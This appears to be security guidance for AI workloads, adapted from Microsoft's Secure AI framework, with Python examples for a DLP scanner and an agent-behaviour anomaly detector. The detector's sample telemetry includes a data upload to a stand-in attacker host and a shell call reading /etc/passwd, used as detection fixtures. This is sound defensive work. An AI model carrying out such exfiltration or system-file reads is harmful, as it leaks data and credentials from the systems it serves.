Adapted from Microsoft CAF's Secure AI process. AI workloads create new attack surfaces that traditional security controls do not fully cover.
25.1 Discover
- Threat-model AI workloads. Start from the existing framework (STRIDE) and supplement it with the MITRE ATLAS and OWASP generative-AI risk inventories. Validate that the enterprise framework actually addresses prompt injection, model inversion, data poisoning and jailbreaks; do not assume it does.
- AI-data risk assessment. Identify where sensitive data flows into agent prompts, RAG retrieval, and training/fine-tuning data.
- Adversarial testing / red-teaming. Before production, after major model updates, and on a periodic cadence. Cover both generative and non-generative models. Document the findings.
- Recurring assessments. New threats emerge; the threat landscape isn't static.
25.2 Protect
- Complete AI asset inventory — internally built and vendor-embedded (§15).
- Secure all agent communication channels. Managed identities (no stored secrets). Private network paths where possible. MCP server endpoints authenticated and not publicly exposed.
- Data boundaries. Classification labels enforced; RBAC by workload and user group; private endpoints for sensitive storage.
- Data-loss prevention. Scan agent inputs and outputs for sensitive data and block or redact it. Add custom detectors for org-specific patterns (internal identifiers, project codenames) that generic detectors will not catch.
- Protect AI artifacts. Models, fine-tuned weights, eval datasets, prompts. Encrypt at rest and in transit. Strict access policies. Monitor for unauthorized access.
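As an added example of the DLP control above (not part of the original page or of Microsoft's CAF guidance): a small Python scanner that runs one detector set over both agent inputs and outputs, redacts lower-severity matches and blocks higher-severity ones. The detector patterns, the Luhn check used to keep random digit strings from being flagged as card numbers, the `ACME-` ticket-ID detector standing in for an org-specific pattern, and the block/redact severities are all assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Callable


@dataclass
class Detector:
    """One DLP detector: a pattern, an optional validator to cut false positives, and a severity."""
    name: str
    pattern: re.Pattern
    action: str = "redact"            # "redact" (mask and allow) or "block" (refuse the message)
    validate: Callable[[str], bool] = field(default=lambda s: True)


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, so that arbitrary 13-16 digit numbers are not reported as cards."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        n = int(ch)
        if i % 2 == 1:                # double every second digit from the right
            n = n * 2 - 9 if n * 2 > 9 else n * 2
        total += n
    return total % 10 == 0


# Assumed detector set; severities are a policy choice, not from the original page.
DETECTORS = [
    Detector("email", re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b")),
    Detector("credit_card", re.compile(r"\b(?:\d[ -]?){13,16}\b"), action="block",
             validate=lambda s: luhn_ok(re.sub(r"\D", "", s))),
    # AWS access key IDs are "AKIA" followed by 16 uppercase alphanumerics.
    Detector("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), action="block"),
    # Hypothetical org-specific detector: internal ticket IDs of the form ACME-12345.
    Detector("internal_ticket_id", re.compile(r"\bACME-\d{5}\b")),
]


@dataclass
class ScanResult:
    verdict: str                      # "allow", "redact" or "block"
    findings: list                    # (detector name, direction, matched text)
    text: str                         # text safe to pass on ("" when blocked)


def scan(text: str, direction: str = "input", detectors=DETECTORS) -> ScanResult:
    """Run every detector over one agent message (prompt or completion) and decide what to do."""
    findings, verdict = [], "allow"
    for d in detectors:
        for m in d.pattern.finditer(text):
            if not d.validate(m.group(0)):
                continue
            findings.append((d.name, direction, m.group(0)))
            if d.action == "block":
                verdict = "block"
            elif verdict == "allow":
                verdict = "redact"
    if verdict == "block":
        # A blocking finding stops the message entirely; nothing is forwarded.
        return ScanResult("block", findings, "")
    redacted = text
    for d in detectors:
        if d.action == "redact":
            redacted = d.pattern.sub(
                lambda m, d=d: f"[{d.name}]" if d.validate(m.group(0)) else m.group(0),
                redacted)
    return ScanResult(verdict, findings, redacted)


if __name__ == "__main__":
    # Constructed sample messages, one in each direction.
    samples = [
        ("input", "Summarize the invoice for jane@example.com, ticket ACME-12345"),
        ("output", "Use key AKIAIOSFODNN7EXAMPLE to fetch the report"),
    ]
    for direction, msg in samples:
        r = scan(msg, direction)
        print(direction, r.verdict, r.findings, repr(r.text))
```

The same `scan` call sits on both sides of the model: before the prompt (including retrieved RAG chunks) reaches the model and before the completion reaches the user or a downstream tool. Findings carry the direction so the SOC can tell leakage into a prompt from leakage out of a completion.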
25.3 Detect
- Automated AI risk detection. Real-time visibility into anomalous agent behavior (unexpected tool use, unusual call volume, outbound data flows), with alerts routed into existing SOC tooling.
- AI-focused incident response procedures. AI-specific runbooks for prompt-injection incidents, jailbreaks, data-exfiltration attempts and model compromise. Exercised regularly, not just written.
- Clear escalation paths for different AI incident types.
- Disaster recovery — multi-region deployment for high-availability agents, tested quarterly, automated backups of trained and fine-tuned artifacts.
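As an added example of the automated detection bullet above (not part of the original page or of Microsoft's guidance): a Python rule pass over agent tool-call telemetry that raises an alert for a tool outside the agent's allowlist, for an outbound request to a host outside the egress allowlist, and for a burst of calls above a rate threshold. The log format, the per-agent policy, the thresholds and the `invoice-bot` / `hr-bot` names are assumptions, and the log lines are constructed.

```python
import json
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed sample of agent tool-call telemetry (JSON lines); not real data.
SAMPLE_LOG = """
{"ts":"2024-05-01T10:00:00Z","agent":"invoice-bot","tool":"read_doc","args":{"id":"inv-1"}}
{"ts":"2024-05-01T10:00:01Z","agent":"invoice-bot","tool":"read_doc","args":{"id":"inv-2"}}
{"ts":"2024-05-01T10:00:02Z","agent":"invoice-bot","tool":"http_post","args":{"url":"https://collector.evil.example/upload"}}
{"ts":"2024-05-01T10:00:02Z","agent":"invoice-bot","tool":"shell","args":{"cmd":"cat /etc/passwd"}}
{"ts":"2024-05-01T10:00:03Z","agent":"invoice-bot","tool":"read_doc","args":{"id":"inv-3"}}
{"ts":"2024-05-01T10:00:03Z","agent":"invoice-bot","tool":"read_doc","args":{"id":"inv-4"}}
{"ts":"2024-05-01T10:00:04Z","agent":"invoice-bot","tool":"read_doc","args":{"id":"inv-5"}}
{"ts":"2024-05-01T10:00:05Z","agent":"invoice-bot","tool":"read_doc","args":{"id":"inv-6"}}
{"ts":"2024-05-01T10:00:06Z","agent":"hr-bot","tool":"http_post","args":{"url":"https://api.internal.example/report"}}
"""

# Hypothetical per-agent policy; every value here is an assumption for the example.
POLICY = {
    "tool_allowlist": {
        "invoice-bot": {"read_doc", "http_post"},
        "hr-bot": {"read_doc", "http_post"},
    },
    "egress_allowlist": {"api.internal.example"},
    "max_calls": 5,          # more than this many calls per window is a burst
    "window_seconds": 10,
}


def parse_log(text: str) -> list:
    """Parse JSON-lines telemetry into events with real datetime timestamps."""
    events = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        events.append(ev)
    return events


def detect(events: list, policy: dict = POLICY) -> list:
    """Apply the three rules to events in time order and return the alerts raised."""
    alerts = []
    windows = defaultdict(deque)                 # per-agent sliding window of call times
    window = timedelta(seconds=policy["window_seconds"])

    def alert(rule, ev, detail):
        alerts.append({"rule": rule, "agent": ev["agent"],
                       "ts": ev["ts"].isoformat(), "detail": detail})

    for ev in sorted(events, key=lambda e: e["ts"]):
        agent, tool, args = ev["agent"], ev["tool"], ev.get("args", {})

        # Rule 1: tool not on this agent's allowlist (unknown agents have no allowed tools).
        if tool not in policy["tool_allowlist"].get(agent, set()):
            alert("unauthorized_tool", ev, tool)

        # Rule 2: outbound request to a host outside the egress allowlist.
        if tool == "http_post":
            host = urlparse(args.get("url", "")).hostname or ""
            if host not in policy["egress_allowlist"]:
                alert("egress_to_unknown_host", ev, host)

        # Rule 3: call burst. Count every call (allowed or not), fire once per burst, then reset.
        w = windows[agent]
        w.append(ev["ts"])
        while w and ev["ts"] - w[0] > window:
            w.popleft()
        if len(w) > policy["max_calls"]:
            alert("call_burst", ev, f"{len(w)} calls within {policy['window_seconds']}s")
            w.clear()
    return alerts


def summarize(alerts: list) -> Counter:
    """Alert counts by rule, the shape a SOC dashboard would aggregate."""
    return Counter(a["rule"] for a in alerts)


if __name__ == "__main__":
    found = detect(parse_log(SAMPLE_LOG))
    for a in found:
        print(a)
    print(dict(summarize(found)))
```

Each alert keeps the agent identity, timestamp and rule name so it can be forwarded to the SIEM as-is and mapped onto the AI-specific runbooks: an `egress_to_unknown_host` hit from an agent that only reads invoices is the data-exfiltration case, `unauthorized_tool` is the signal to look for a prompt-injection source in the documents it read.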